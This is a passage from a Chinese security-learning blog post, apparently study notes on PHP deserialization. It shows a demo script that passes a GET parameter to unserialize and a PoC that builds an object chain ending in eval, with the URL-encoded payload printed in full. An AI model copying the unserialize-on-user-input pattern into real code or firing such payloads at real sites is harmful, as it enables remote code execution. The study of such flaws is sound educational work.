<span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;这是f3的析构函数&lt;br /&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;x&#x27;</span>])) &#123;</span><br><span class="line">		unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;x&#x27;</span>]);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>poc<br>test3：eval任意命令执行-&gt;test2:__tostring调用execute方法-&gt;test1:对象转化为字符串调用test2：__tostring</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">test1</span></span>&#123;</span><br><span class="line">		<span class="keyword">public</span> <span class="variable">$varr</span>;</span><br><span class="line">		<span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">		</span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;varr = <span class="keyword">new</span> test2();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">test2</span></span></span><br><span class="line"><span class="class">	</span>&#123;</span><br><span class="line">		<span class="keyword">public</span> <span class="variable">$varr</span>;</span><br><span class="line">		<span class="keyword">public</span> <span class="variable">$obj</span>;</span><br><span class="line">		<span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">		</span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;varr=<span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;obj=<span class="keyword">new</span> test3();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">test3</span></span></span><br><span class="line"><span class="class">	</span>&#123;</span><br><span class="line">		<span class="keyword">public</span> <span class="variable">$varr</span> = <span class="string">&#x27;phpinfo();&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="variable">$o</span> = <span class="keyword">new</span> test1();</span><br><span class="line">	<span class="variable">$s</span> = serialize(<span class="variable">$o</span>);</span><br><span class="line">	<span class="keyword">echo</span> urlencode(<span class="variable">$s</span>);</span><br><span class="line"><span class="comment">//O%3A5%3A%22test1%22%3A1%3A%7Bs%3A4%3A%22varr%22%3BO%3A5%3A%22test2%22%3A2%3A%7Bs%3A4%3A%22varr%22%3Bs%3A6%3A%22123456%22%3Bs%3A3%3A%22obj%22%3BO%3A5%3A%22test3%22%3A1%3A%7Bs%3A4%3A%22varr%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D%7D</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/28/3-30/" rel="prev" title="3-30">
      <i class="fa fa-chevron-left"></i> 3-30
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/04/11/4-13/" rel="next" title="4-13">
      4-13 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="MTAyMC81NDU4OS8zMTA2MA=="></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E6%9B%BF%E6%8D%A2%E8%A7%A3%E7%A0%81"><span class="nav-number">1.</span> <span class="nav-text">字符替换解码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RITSECctf"><span class="nav-number">2.</span> <span class="nav-text">RITSECctf</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#web"><span class="nav-number">2.1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Pretty-Horrible-Program1"><span class="nav-number">2.1.1.</span> <span class="nav-text">Pretty Horrible Program1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Pretty-Horrible-Program2"><span class="nav-number">2.1.2.</span> <span class="nav-text">Pretty Horrible Program2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Pretty-Horrible-Program3"><span class="nav-number">2.1.3.</span> <span class="nav-text">Pretty Horrible Program3</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Really-Cool-Encryption"><span class="nav-number">2.1.4.</span> <span class="nav-text">Really Cool Encryption</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Space-Heroes-CTF-2022"><span class="nav-number">3.</span> <span class="nav-text">Space Heroes CTF 2022</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#web-1"><span class="nav-number">3.1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#R2D2"><span class="nav-number">3.1.1.</span> <span class="nav-text">R2D2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Space-traveler"><span class="nav-number">3.1.2.</span> <span class="nav-text">Space traveler</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96demo"><span class="nav-number">4.</span> <span class="nav-text">反序列化demo</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#demo1"><span class="nav-number">4.1.</span> <span class="nav-text">demo1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DEMO2"><span class="nav-number">4.2.</span> <span class="nav-text">DEMO2</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">hanbaiGG</p>
  <div class="site-description" itemprop="description">为什么不拉弟弟一把呢</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Tue Oct 19 2021 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">hanbaiGG</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.8' zIndex='-1' count='300' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  















  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
